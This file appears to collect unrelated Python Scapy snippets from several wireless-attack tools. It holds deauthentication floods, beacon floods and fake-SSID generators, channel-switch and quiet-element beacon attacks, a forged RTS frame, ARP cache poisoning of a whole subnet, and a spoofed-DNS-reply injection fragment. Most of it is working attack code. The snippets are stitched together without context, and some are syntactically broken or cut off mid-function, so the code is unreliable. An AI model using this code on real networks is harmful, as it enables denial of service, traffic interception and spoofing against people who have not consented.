def channelSwitchAttack(config): frame = "" frameType = "beacon" #choose betweeen action_frame or beacon. #enable monitor mode and set the channel. setMonitorMode(config["iface"]) setChannel(str(config["iface"]), config["channel"]) timeToRun = (time.time() + config["time"]) print("Sending channelSwitchBeacon to " + str(config["mac"]) + " from: " + config["bssid"] + " on channel: " + str(config["channel"])) if(frameType == "action_frame"): dot11 = Dot11(type=0, subtype=13, addr1=config["mac"], addr2=config["bssid"], addr3=config["bssid"]) category = ('\x00' # spectrum management '\x04') #channel switch announcement csa = Dot11Elt(ID='Channel Switch', info=( '\x00' #Channel switch mode '\x04' #new channel )) '\x00')) #channel switch cnt frame = RadioTap()/dot11/category/csa elif(frameType == "beacon"): dot11 = Dot11(type=0, subtype=8, addr1=config["mac"], addr2=config["bssid"], addr3=config["bssid"]) beacon = Dot11Beacon(cap='ESS+privacy') essid = Dot11Elt(ID='SSID',info=config["ssid"], len=len(config["ssid"])) csa = Dot11Elt(ID='Channel Switch', info=( '\x00' #Channel switch mode '\x64' #new channel )) '\x00')) #channel switch cnt frame = RadioTap()/dot11/beacon/essid/csa printTime() while(time.time() < timeToRun): #frame.show() sendp(frame, iface=config["iface"], loop=0, verbose=0) time.sleep(config["interval"]) printTime()
def send(bssid, client, count): pckt_to_ap = RadioTap() / Dot11(addr1=client, addr2=bssid, addr3=bssid) / Dot11Deauth() pckt_to_client = None if client != 'FF:FF:FF:FF:FF:FF': pckt_to_client = RadioTap() / Dot11( addr1=bssid, addr2=client, addr3=bssid) / Dot11Deauth() print('Sending Deauth to ' + client + ' from ' + bssid) if not count: print('Press CTRL+C to quit') # We will do like aireplay does and send the packets in bursts of 64, then sleep for half a sec or so while count != 0: try: for i in range(64): sendp(pckt_to_ap, verbose=0) # Send deauthentication frame to the AP if pckt_to_client: sendp(pckt_to_client ) # Send deauthentication frame to the Client os.write(1, b".") # show sending status count -= 1 # If count was -1, this will be an infinite loop os.write(1, b"\r") # clear one line time.sleep(.5) except KeyboardInterrupt: break
def deauthAttack(config): #enable monitor mode and set the channel. setMonitorMode(config["iface"]) setChannel(str(config["iface"]), config["channel"]) timeToRun = (time.time() + config["time"]) packetToClient = RadioTap()/Dot11(type=0,subtype=12,addr1=config["mac"],addr2=config["bssid"],addr3=config["bssid"])/Dot11Deauth(reason=7) packetToAP = RadioTap()/Dot11(type=0,subtype=12,addr1=config["bssid"],addr2=config["mac"],addr3=config["mac"])/Dot11Deauth(reason=7) print("DA:" + str(config["mac"]) + " SA: " + str(config["bssid"]) + " BSSID: " + str(config["bssid"])) printTime() b = 1 while(time.time() < timeToRun): if (config["amount"]): for i in range(int(config["amount"])): sendp(packetToAP, iface=config["iface"], loop=0, verbose=0) sendp(packetToClient, iface=config["iface"], loop=0, verbose=0) sleep(config["interval"]) else: print(str(b) + " frame(s) send.. ") printTime() sendp(packetToAP, iface=config["iface"], loop=0, verbose=0) sendp(packetToClient, iface=config["iface"], loop=0, verbose=0) time.sleep(config["interval"]) b+=1 printTime()
def stormWithBeaconFrames(): global interfaceName global monitorInterface log("Starting with storming on interface [{}]".format(interfaceName)) netSSID = 'testSSID' #Network name here iface = 'wlan0mon' #Interface name here dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=str(RandMAC()), addr3=str(RandMAC())) beacon = Dot11Beacon(cap='ESS+privacy') essid = Dot11Elt(ID='SSID',info=netSSID, len=len(netSSID)) rsn = Dot11Elt(ID='RSNinfo', info=( '\x01\x00' #RSN Version 1 '\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP '\x02\x00' #2 Pairwise Cipher Suites (next two lines) '\x00\x0f\xac\x04' #AES Cipher '\x00\x0f\xac\x02' #TKIP Cipher '\x01\x00' #1 Authentication Key Managment Suite (line below) '\x00\x0f\xac\x02' #Pre-Shared Key '\x00\x00')) #RSN Capabilities (no extra capabilities) frame = RadioTap()/dot11/beacon/essid/rsn frame.show() print("\nHexdump of frame:") hexdump(frame) raw_input("\nPress enter to start\n") sendp(frame, iface=iface, inter=0.100, loop=1)
def test(): netSSID = 'testSSID' #Network name here iface = 'mon5' #Interface name here dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2='22:22:22:22:22:22', addr3='33:33:33:33:33:33') beacon = Dot11Beacon(cap='ESS+privacy') essid = Dot11Elt(ID='SSID',info=netSSID, len=len(netSSID)) rsn = Dot11Elt(ID='RSNinfo', info=( '\x01\x00' #RSN Version 1 '\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP '\x02\x00' #2 Pairwise Cipher Suites (next two lines) '\x00\x0f\xac\x04' #AES Cipher '\x00\x0f\xac\x02' #TKIP Cipher '\x01\x00' #1 Authentication Key Managment Suite (line below) '\x00\x0f\xac\x02' #Pre-Shared Key '\x00\x00')) #RSN Capabilities (no extra capabilities) frame = RadioTap()/dot11/beacon/essid/rsn frame.show() print("\nHexDump of frame:") hexdump(frame) raw_input("\nPress enter to start\n") sendp(frame, iface=iface, inter=0.100, loop=1)
def create_beacon(name, password_protected=False): dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=str(RandMAC()), addr3=str(RandMAC())) beacon = Dot11Beacon( cap='ESS+privacy' if password_protected else 'ESS') essid = Dot11Elt(ID='SSID', info=name, len=len(name)) if not password_protected: return RadioTap() / dot11 / beacon / essid rsn = Dot11Elt(ID='RSNinfo', info=('\x01\x00' '\x00\x0f\xac\x02' '\x02\x00' '\x00\x0f\xac\x04' '\x00\x0f\xac\x02' '\x01\x00' '\x00\x0f\xac\x02' '\x00\x00')) return RadioTap() / dot11 / beacon / essid / rsn
def interpret_targets(self, ap_targets, client_targets): if not self._targeted_only: for access_point in ap_targets: deauth_packet = RadioTap() / \ Dot11(type=0,subtype=12, addr1="FF:FF:FF:FF:FF:FF", \ addr2=access_point.bssid, \ addr3=access_point.bssid) / \ Dot11Deauth(reason=7) self.packets.add(deauth_packet) for client in client_targets: mac = client.client_mac bssid = client.associated_bssid if bssid == None: continue deauth_packet1 = RadioTap() / \ Dot11(type=0,subtype=12, addr1=bssid, addr2=mac, addr3=mac) / \ Dot11Deauth(reason=7) deauth_packet2 = RadioTap() / \ Dot11(type=0,subtype=12, addr1=mac, addr2=bssid, addr3=bssid) / \ Dot11Deauth(reason=7) self.packets.add(deauth_packet1) self.packets.add(deauth_packet2)
def __init__( self, config: dict, boot_time: datetime.datetime, lock: Lock, sequence_number: Value, queue: Queue, ): self.log = logging.getLogger(inspect.stack()[0][1].split("/")[-1]) self.log.debug("sniffer %s; parent pid: %s", os.getpid(), os.getppid()) self.queue = queue self.boot_time = boot_time self.config = config self.sequence_number = sequence_number self.ssid = config.get("GENERAL").get("ssid") self.interface = config.get("GENERAL").get("interface") self.channel = int(config.get("GENERAL").get("channel")) self.assoc_reqs = {} self.bpf_filter = "type mgt subtype probe-req or type mgt subtype auth or type mgt subtype assoc-req or type mgt subtype reassoc-req" # mgt bpf filter: assoc-req, assoc-resp, reassoc-req, reassoc-resp, probe-req, probe-resp, beacon, atim, disassoc, auth, deauth # ctl bpf filter: ps-poll, rts, cts, ack, cf-end, cf-end-ack scapyconf.iface = self.interface self.l2socket = scapyconf.L2socket(iface=self.interface) self.log.debug(self.l2socket.outs) self.received_frame_cb = self.received_frame self.dot11_probe_request_cb = self.probe_response self.dot11_assoc_request_cb = self.assoc_req self.dot11_auth_cb = self.auth with lock: probe_resp_ies = build_fake_frame_ies(self.config) self.mac = get_mac(self.interface) self.probe_response_frame = ( RadioTap() / Dot11( subtype=DOT11_SUBTYPE_PROBE_RESP, addr2=self.mac, addr3=self.mac ) / Dot11ProbeResp(cap=0x1111) / probe_resp_ies ) self.auth_frame = ( RadioTap() / Dot11(subtype=DOT11_SUBTYPE_AUTH_REQ, addr2=self.mac, addr3=self.mac) / Dot11Auth(seqnum=0x02) ) sniff( iface=self.interface, prn=self.received_frame_cb, store=0, filter=self.bpf_filter, )
def geracao_pacotes(self): netSSID = 'testSSID' iface = 'wlp3s0mon' #Nome da Interface Wireless mac_forjado_pr = self.criacao_mac_ponto_referencia() numero_pacotes = int(self.numero_pacotes.get()) intervalo_envio = float(self.intervalo.get()) ## addr1 = MAC de destino (MAC da placa wireless) ## addr2 = Endereco MAC de origem do remetente. (MAC forjado) ## addr3 = Endereco MAC do ponto de acesso. dot11 = Dot11(type=0, subtype=8, addr1='E4:18:6B:4B:94:00', addr2=mac_forjado_pr, addr3='33:33:33:33:33:33') beacon = Dot11Beacon( cap='ESS+privacy') ## indica a capacidade do ponto de acesso essid = Dot11Elt(ID='SSID', info=netSSID, len=len(netSSID)) rsn = Dot11Elt(ID='RSNinfo', info=('\x01\x00' '\x00\x0f\xac\x02' '\x02\x00' '\x00\x0f\xac\x04' '\x00\x0f\xac\x02' '\x01\x00' '\x00\x0f\xac\x02' '\x00\x00')) frame = RadioTap() / dot11 / beacon / essid / rsn frame.show() print("HexDump of frame") hexdump(frame) a = sendp(frame / "RURALRURALRURAL", iface=iface, inter=intervalo_envio, loop=0, count=numero_pacotes ) # inter = intervalo entre o envio dos pacotes print(a) self.atualizar_tela()
def deauthentication_attack(self): # Based on: # https://raidersec.blogspot.pt/2013/01/wireless-deauth-attack-using-aireplay.html packets = [] if not self._targeted_only: for DeauthAP in self.aps_to_deauth: deauth_packet = RadioTap() / \ Dot11(type=0,subtype=12, addr1="FF:FF:FF:FF:FF:FF", addr2=DeauthAP.bssid, addr3=DeauthAP.bssid) / \ Dot11Deauth(reason=7) packets.append(deauth_packet) for client in self.clients_to_deauth: mac = client.client_mac bssid = client.bssid deauth_packet1 = RadioTap() / \ Dot11(type=0,subtype=12, addr1=bssid, addr2=mac, addr3=mac) / \ Dot11Deauth(reason=7) deauth_packet2 = RadioTap() / \ Dot11(type=0,subtype=12, addr1=mac, addr2=bssid, addr3=bssid) / \ Dot11Deauth(reason=7) packets.append(deauth_packet1) packets.append(deauth_packet2) count = self._burst_count if self._burst_count > 0 else 5 print dedent("[+] Starting deauthentication attack \n\ - {nburst} bursts of 20 packets \n\ - {npackets} different packets").format( nburst=self._burst_count, npackets=len(packets)) try: while count >= 0 and self.deauth_running: for packet in packets: sendp(packet, iface = self.running_interface, count = 2, inter = 0.1, verbose=0) count -= 1 except socket_error as e: if not e.errno == 100: print e traceback.print_exc() except Exception as e: print "Exception: {}".format(e) print "[-] Stopping deauthentication attack." self.deauth_running = False self._restore_deauthor_state() print "[+] Deauthentication attack finished executing."
def craft_deauth_packets(self, client_mac, ap_bssid): # Craft Deauthentication packets with multiple reason codes deauthentication_packets = [] for reason_code in range(6, 20): deauth_packet1 = RadioTap() / \ Dot11(type=0,subtype=12, addr1=ap_bssid, addr2=client_mac, addr3=client_mac) / \ Dot11Deauth(reason=reason_code) deauth_packet2 = RadioTap() / \ Dot11(type=0,subtype=12, addr1=client_mac, addr2=ap_bssid, addr3=ap_bssid) / \ Dot11Deauth(reason=reason_code) deauthentication_packets.append(deauth_packet1) deauthentication_packets.append(deauth_packet2) return deauthentication_packets
def createAccessPoint(interface, ssid): dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2='22:22:22:22:22:22', addr3='33:33:33:33:33:33') beacon = Dot11Beacon(cap='ESS+privacy') essid = Dot11Elt(ID='SSID', info=ssid, len=len(ssid)) rsn = Dot11Elt(ID='RSNinfo', info=('\x01\x00' '\x00\x0f\xac\x02' '\x02\x00' '\x00\x0f\xac\x04' '\x00\x0f\xac\x02' '\x01\x00' '\x00\x0f\xac\x02' '\x00\x00')) frame = RadioTap() / dot11 / beacon / essid / rsn log.info("Beacon Frame created with SSID: '" + ssid + "'") log.info("Transmitting Beacon through interface '" + interface + "'") raw_input("\nPress Enter to start Access Point '" + ssid + "'\n") log.success("Access Point Created!") sendp(frame, iface=interface, inter=0.10, loop=1)
def main(): ssids = sys.argv[2:] #Network name here iface = sys.argv[1] #Interface name here frames = [] for netSSID in ssids: print netSSID dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=str(RandMAC()), addr3=str(RandMAC())) beacon = Dot11Beacon(cap='ESS+privacy') essid = Dot11Elt(ID='SSID', info=netSSID, len=len(netSSID)) rsn = Dot11Elt( ID='RSNinfo', info=( '\x01\x00' #RSN Version 1 '\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP '\x02\x00' #2 Pairwise Cipher Suites (next two lines) '\x00\x0f\xac\x04' #AES Cipher '\x00\x0f\xac\x02' #TKIP Cipher '\x01\x00' #1 Authentication Key Managment Suite (line below) '\x00\x0f\xac\x02' #Pre-Shared Key '\x00\x00')) #RSN Capabilities (no extra capabilities) frame = RadioTap() / dot11 / beacon / essid / rsn print "SSID=%-20s %r" % (netSSID, frame) frames.append(frame) sendp(frames, iface=iface, inter=0.0100 if len(frames) < 10 else 0, loop=1)
def ssidSpawner(config): #enable monitor mode and set the channel. setMonitorMode(config["iface"]) setChannel(str(config["iface"]), config["channel"]) frames = [] while True: #for netSSID in ssids: netSSID = id_generator() print(netSSID) dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff',addr2=str(RandMAC()), addr3=str(RandMAC())) beacon = Dot11Beacon(cap='ESS+privacy') essid = Dot11Elt(ID='SSID',info=netSSID, len=len(netSSID)) rsn = Dot11Elt(ID='RSNinfo', info=( '\x01' #RSN Version 1 '\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP '\x02\x00' #2 Pairwise Cipher Suites (next two lines) '\x00\x0f\xac\x04' #AES Cipher '\x00\x0f\xac\x02' #TKIP Cipher '\x01\x00' #1 Authentication Key Managment Suite (line below) '\x00\x0f\xac\x02' #Pre-Shared Key '\x00\x00')) #RSN Capabilities (no extra capabilities) frame = RadioTap()/dot11/beacon/essid/rsn print("SSID=%-20s %r"%(netSSID,frame)) frames.append(frame) sendp(frames, iface=iface, inter=0.0100 if len(frames)<10 else 0, loop=1)
def deauth(self, wireless_interface: str = 'wlan0', bssid: str = '01:23:45:67:89:0a', client: str = '01:23:45:67:89:0b', delay: int = 5, number_of_deauth_packets: int = 5) -> None: """ Sending 802.11 deauth packets :param wireless_interface: A wireless interface name for sending deauth packets (default: 'wlan0') :param bssid: BSSID (example: '01:23:45:67:89:0a') :param client: A client MAC address for deauth (example: '01:23:45:67:89:0b') :param delay: A delay between sending deauth packets (default: 5) :param number_of_deauth_packets: The number of deauth packets for one iteration (default: 5) :return: None """ deauth_packet: bytes = RadioTap() / \ Dot11(type=0, subtype=12, addr1=client.lower(), addr2=bssid.lower(), addr3=bssid.lower()) / \ Dot11Deauth(reason=7) sleep(delay) while True: sendp(deauth_packet, iface=wireless_interface, count=number_of_deauth_packets, verbose=False) self.print_info('Send ', str(number_of_deauth_packets), ' deauth packets to: ', client, ' from: ', bssid) sleep(delay)
def encapsulate(payload, addr_from, addr_to=BroadcastAddress): from scapy.all import Dot11, Dot11Beacon, Dot11Elt, RadioTap radio = RadioTap() dot11 = Dot11(type=0, subtype=8, addr1=addr_to, addr2=SignatureAddress, addr3=addr_from) beacon = Dot11Beacon(cap='ESS') frame = radio / dot11 / beacon data_size = len(payload) data_left = data_size data_off = 0 chunk_size = 255 while data_left > 0: sz = min(chunk_size, data_left) chunk = payload[data_off:data_off + sz] frame /= Dot11Elt(ID=Dot11ElemID_Identity, info=chunk, len=sz) data_off += sz data_left -= sz return frame
def quietAttack(config): #enable monitor mode and set the channel. setMonitorMode(config["iface"]) setChannel(str(config["iface"]), config["channel"]) timeToRun = (time.time() + config["time"]) dot11 = Dot11(type=0, subtype=8, addr1=config["mac"], addr2=config["bssid"], addr3=config["bssid"]) beacon = Dot11Beacon(cap='ESS+privacy') essid = Dot11Elt(ID='SSID',info=config["ssid"], len=len(config["ssid"])) rsn = Dot11Elt(ID='RSNinfo', info=( '\x01' #RSN Version 1 '\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP '\x02\x00' #2 Pairwise Cipher Suites (next two lines) '\x00\x0f\xac\x04' #AES Cipher '\x00\x0f\xac\x02' #TKIP Cipher '\x01\x00' #1 Authentication Key Managment Suite (line below) '\x00\x0f\xac\x02' #Pre-Shared Key '\x01\x00')) #RSN Capabilities (no extra capabilities) quiet = Dot11Elt(ID='Quiet', info=( '\x00' #Quiet count | remaining beacon intervals before quiet interval starts (0 for direct) '\x00' #Quiet period | #0 indicates no quiet periods are scheduled. A non-zero value indicates the number of beacon intervals between each period. '\x00\x10' #Quiet duration | length of quiet period in time units (TU). '\x00\x00')) #Quiet offset | possiblity to specify other start time than right after beacon in TU, But has to be shorther than beacon interval. frame = RadioTap()/dot11/beacon/essid/quiet printTime() while(time.time() < timeToRun): sendp(frame, iface=config["iface"], loop=0, verbose=0) time.sleep(config["interval"]) printTime()
def main(): if len(sys.argv) < 3: print("usage: %s <interface> <words of name>" % sys.argv[0]) sys.exit(1) iface = sys.argv[1] name = ' '.join(sys.argv[2:]) frames = [] for suffix in ap_slander: ssid = name + ' ' + suffix.upper() print(ssid) dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=str(RandMAC()), addr3=str(RandMAC())) beacon = Dot11Beacon(cap='ESS+privacy') essid = Dot11Elt(ID='SSID', info=ssid, len=len(ssid)) rsn = Dot11Elt( ID='RSNinfo', info=( '\x01\x00' #RSN Version 1 '\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP '\x02\x00' #2 Pairwise Cipher Suites (next two lines) '\x00\x0f\xac\x04' #AES Cipher '\x00\x0f\xac\x02' #TKIP Cipher '\x01\x00' #1 Authentication Key Managment Suite (line below) '\x00\x0f\xac\x02' #Pre-Shared Key '\x00\x00')) #RSN Capabilities (no extra capabilities) frame = RadioTap() / dot11 / beacon / essid / rsn #print("SSID=%-20s %r"%(ssid,frame)) frames.append(frame) sendp(frames, iface=iface, inter=0.0100 if len(frames) < 10 else 0, loop=1)
def geracao_pacotes(): nome_ponto_referencia = input('Insira o nome do Ponto de Referência: ') mac_forjado_pr = criacao_mac_ponto_referencia(nome_ponto_referencia) tempo_execucao = float(input("Insira o tempo de execucao (minutos): ")) print('\n_________________________________________') intervalo_envio = float( input( "Insira o intervalo de frequencia de envio de pacotes (em segundos) : " )) print('\n_________________________________________') num_pacotes = (tempo_execucao * 60) / intervalo_envio data = "UFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJ" ## addr1 = MAC de destino (MAC da placa wireless) ## addr2 = Endereco MAC de origem do remetente. (MAC forjado) ## addr3 = Endereco MAC do ponto de acesso. dot11 = Dot11(type=2, subtype=0, addr1='E4:18:6B:4B:94:00', addr2=mac_forjado_pr, addr3='33:33:33:33:33:33') essid = Dot11Elt( ID='SSID', info='testSSID', len=len('testSSID')) # indica a capacidade do ponto de acesso frame = RadioTap() / dot11 / essid / data frame.show() input("Digite enter para o inicio do envio de pacotes:") sendp( frame, iface='wlp3s0mon', inter=intervalo_envio, loop=0, count=num_pacotes ) # iface = Nome da Interface Wireless. inter = intervalo entre o envio dos pacotes (em segundos). count = numero de pacotes escreve_arquivo(nome_ponto_referencia, mac_forjado_pr)
def __send_poison(self): print "[*] Scanning for alive hosts.." target = self.__get_targets(str(self.gateway + "/24")) print "Done!" print "[*] Starting to poison.." print "" if self.log: with open("/var/log/fun&games.log", "a") as f: f.write("Poisoning the ARP cache " + str(datetime.now()) + "\n") while True: try: for i in range( len(target) ): # if you have no idea whats going on below, read the scapy docs if self.wireless == False: poison_target = Ether() / ARP(op=2, psrc=self.gateway, pdst=target[i][0], hwdst=target[i][1]) poison_router = Ether() / ARP(op=2, psrc=target[i][0], pdst=self.gateway, hwdst=self.router_mac) sendp(poison_target) sendp(poison_router) else: poison_target = RadioTap() / ARP(op=2, psrc=self.gateway, pdst=target[i][0], hwdst=target[i][1]) poison_router = RadioTap() / ARP(op=2, psrc=target[i][0], pdst=self.gateway, hwdst=self.router_mac) sendp(poison_target, iface=self.iface) sendp(poison_router, iface=self.iface) time.sleep(1) except: if self.log: with open("/var/log/fun&games.log", "a") as f: f.write("ARP poisoning failed " + str(datetime.now()) + "\n") sys.exit( "A major fuckup, can't spam my favorite ARP requests..")
def deauth(iface: str, count: int, bssid: str, target_mac: str): """ - addr1=target_mac specifies that this packet will go to the victim's computer - addr2=bssid specifies the MAC address of the AP - addr3=bssid is the same as addr2 """ dot11 = Dot11(addr1=target_mac, addr2=bssid, addr3=bssid) frame = RadioTap()/dot11/Dot11Deauth() sendp(frame, iface=iface, count=count, inter=0.100)
def sendAssocReq(): #packet to client dot11 = Dot11(type=0, subtype=0, addr1=config["bssid"], addr2=config["mac"], addr3=config["mac"]) auth = Dot11AssoReq(ID=ESS, info='\x01')#ESS=0x0, privacy=0x1) essid = Dot11Elt(ID='SSID',info="wips-test-psk", len=len("wips-test-psk")) #rsn omzetten naar Dot11EltRSN rsn = Dot11Elt(ID='RSNinfo', info=( '\x01' #RSN Version 1 '\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP '\x02\x00' #2 Pairwise Cipher Suites (next two lines) '\x00\x0f\xac\x04' #AES Cipher '\x00\x0f\xac\x02' #TKIP Cipher '\x01\x00' #1 Authentication Key Managment Suite (line below) '\x00\x0f\xac\x02' #Pre-Shared Key '\x00\x00')) #RSN Capabilities (no extra capabilities) frame = RadioTap()/dot11/auth/essid#/rsn frame.show() sendp(frame, iface=config["iface"], inter=0.100, loop=0)
def deauth(self, iface: NetworkInterface, count = 1): d11 = RadioTap() / Dot11( addr1 = 'ff:ff:ff:ff:ff:ff', addr2 = self.bssid, addr3 = self.bssid ) pkt = d11 / Dot11Deauth(reason = 3) iface.set_channel(self.channel) iface.send(pkt, verbose = False, inter = 0.75, count = count)
def _send_802_11_frame(self, ssid): dot11 = Dot11(type=0,subtype=8,addr1="ff:ff:ff:ff:ff:ff", addr2=self.ap.ip,addr3=self.ap.ip) beacon = Dot11Beacon() essid = Dot11Elt(ID='SSID',info=ssid,len=len(ssid)) radiotap = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', notdecoded='\x00\x6c' + get_frequency(self.ap.ch) + '\xc0\x00\xc0\x01\x00\x00') frame = radiotap/dot11/beacon/essid sendp(frame, iface=self.ap.iface, verbose=False)
def build(name): dot11_header = Dot11(type=0, subtype=8, addr1=dest, addr2=source, addr3=source) beacon = Dot11Beacon(cap=0x1111) data = ( beacon / Dot11Elt(ID="SSID", info=ssid(name)) / Dot11Elt(ID="Rates", info=bytes([140, 18, 152, 36, 176, 72, 96, 108]))) return RadioTap() / dot11_header / data
def send_beacon(mac, ssid, verbose = False): dot11 = Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=mac, addr3=mac, type=0, subtype=8) beacon = Dot11Beacon(cap="ESS+privacy") essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid)) frame = RadioTap() / dot11 / beacon / essid if verbose: print(f"Sending beacon: {ssid}") sendp(frame, inter=0.1, loop=1, iface=interface, verbose=0)
def forgedRTS(): millis = 615 blob = struct.pack("<H", millis) millis = struct.unpack(">H", blob)[0] dot11 = Dot11(addr1=TARGET_STATION, addr2=SRC_ADDR, type=CONTROL, subtype=RTS_SUBTYPE, ID=millis) return RadioTap() / dot11
def __beacon_send(self, ssid, inter, enc): addr2 = gu.rand_mac() addr3 = gu.rand_mac() dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=addr2, addr3=addr3) beacon = Dot11Beacon(cap='ESS') beacon_enc = Dot11Beacon(cap='ESS+privacy') essid = Dot11Elt(ID='SSID', info=ssid, len=len(ssid)) rsn = Dot11Elt( ID='RSNinfo', info= ('\x01\x00\x00\x0f\xac\x02\x02\x00\x00\x0f\xac\x04\x00\x0f\xac\x02\x01\x00\x00\x0f\xac\x02\x00\x00' )) if enc: frame = RadioTap() / dot11 / beacon_enc / essid / rsn else: frame = RadioTap() / dot11 / beacon / essid sendp(frame, iface=self.iface, inter=inter, loop=1)
def interpret_targets(self, ap_targets, client_targets): """ A broadcast Deauth packet is created for every access point in the list. A directed Deauth packet is created for every client in the list. """ # Packet creation based on: # https://raidersec.blogspot.pt/2013/01/wireless-deauth-attack-using-aireplay.html if not self._targeted_only: for access_point in ap_targets: deauth_packet = RadioTap() / \ Dot11(type=0, subtype=12, addr1="FF:FF:FF:FF:FF:FF", addr2=access_point.bssid, addr3=access_point.bssid) / \ Dot11Deauth(reason=7) self.packets.add(deauth_packet) SessionManager().log_event(NeutralEvent("Added AP with BSSID '{}' as deauthentication target." .format(access_point.bssid))) for client in client_targets: mac = client.client_mac bssid = client.associated_bssid if bssid is None: continue deauth_packet1 = RadioTap() / \ Dot11(type=0, subtype=12, addr1=bssid, addr2=mac, addr3=mac) / \ Dot11Deauth(reason=7) deauth_packet2 = RadioTap() / \ Dot11(type=0, subtype=12, addr1=mac, addr2=bssid, addr3=bssid) / \ Dot11Deauth(reason=7) self.packets.add(deauth_packet1) self.packets.add(deauth_packet2) SessionManager().log_event(NeutralEvent("Added Client with MAC '{}' as deauthentication target." .format(mac)))
def radiotap(self): present = '' data = '' if self._tap.rate is not None: if present == '': present = 'Rate' else: present += '+Rate' data += struct.pack('<B', ((self._tap.rate) * 10) / 5) if self._tap.power is not None: if present == '': present = 'dBm_TX_Power' else: present += '+dBm_TX_Power' data += struct.pack('<b', self._tap.power) if self._tap.tx_flags is not None: pass if self._tap.retries is not None: if present == '': present = 'b17' else: present += '+b17' data += struct.pack('<B', self._tap.retries) if self._tap.mcs is not None: pass if present == '': rt = RadioTap() else: rt = RadioTap(present=present, notdecoded=data) return rt
os.write(1,"%s\n" % dot11_frame.summary()) if dot11_frame.getlayer(Dot11).addr1 != BSSID: continue # Identifying DNS Queries if dot11_frame.haslayer(DNS) and dot11_frame.getlayer(DNS).qr == 0: if DEBUG: os.write(1,"Received DNS Query on %s\n" % IN_IFACE) if VERB: os.write(1,"%s\n" % dot11_frame.summary()) # Building DNS Reply answer for injection dot11_answer = RadioTap()/Dot11( type = "Data", FCfield = "from-DS", addr1 = dot11_frame.getlayer(Dot11).addr2, addr2 = BSSID) if not HAS_SMAC: dot11_answer.addr3 = dot11_frame.getlayer(Dot11).addr1 else: dot11_answer.addr3 = SMAC if WEP: dot11_answer.FCfield |= 0x40 dot11_answer /= Dot11WEP( iv = "111", keyid = KEYID) dot11_answer /= LLC(ctrl = 3)/SNAP()/IP( src = dot11_frame.getlayer(IP).dst, dst = dot11_frame.getlayer(IP).src, ttl = TTL)
